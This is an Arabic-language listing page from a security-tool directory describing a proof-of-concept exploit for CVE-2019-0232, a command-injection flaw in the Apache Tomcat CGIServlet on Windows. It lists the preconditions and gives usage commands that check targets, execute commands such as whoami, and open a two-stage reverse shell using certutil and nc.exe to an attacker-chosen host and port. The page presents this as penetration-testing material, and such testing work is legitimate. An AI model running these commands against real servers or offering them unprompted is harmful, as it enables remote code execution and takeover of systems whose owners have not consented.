Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0232 — CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit | Kitploit
أدوات/GitHubGitHub/yuzuki-ayanami/cve-2019-0232
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubyuzuki-ayanami/cve-2019-0232

CVE-2019-0232

CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

عرض المستودع
112منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
tomcat

CVE-2019-0232

Apache Tomcat CGIServlet enableCmdLineArguments RCE

حقن سكريبت ويندوز الدفعي عبر وسائط سلسلة الاستعلام

الوصف

عند تمكين CGI servlet في Apache Tomcat مع enableCmdLineArguments=true، يتم تمرير معاملات سلسلة الاستعلام كوسائط سطر أوامر إلى سكريبتات CGI. على نظام ويندوز، تقوم الملفات الدفعية (.bat/.cmd) بتفسير & كفاصل أوامر، مما يسمح بتنفيذ أوامر عشوائية عبر URL مصمم خصيصاً.

الشروط المسبقة

  • تمكين CGI servlet في conf/web.xml أو WEB-INF/web.xml
  • تعيين enableCmdLineArguments=true في معاملات init الخاصة بـ CGI servlet
  • وجود سكريبت CGI (مثل ism.bat) منشور وقابل للوصول
  • هدف يعمل بنظام ويندوز (الملفات الدفعية مطلوبة لحقن &)

الاستخدام

root@kitploit:~
git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt

التحقق من وجود نقطة نهاية CGI:

root@kitploit:~
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat

تنفيذ أمر:

root@kitploit:~
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'

شل عكسي (on مرحلتين certutil + nc.exe):

root@kitploit:~
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444

المتطلبات

  • Python 3.8+
  • requests
  • هدف يعمل بنظام ويندوز (الثغرة خاصة بنظام التشغيل)
تنزيل الأداة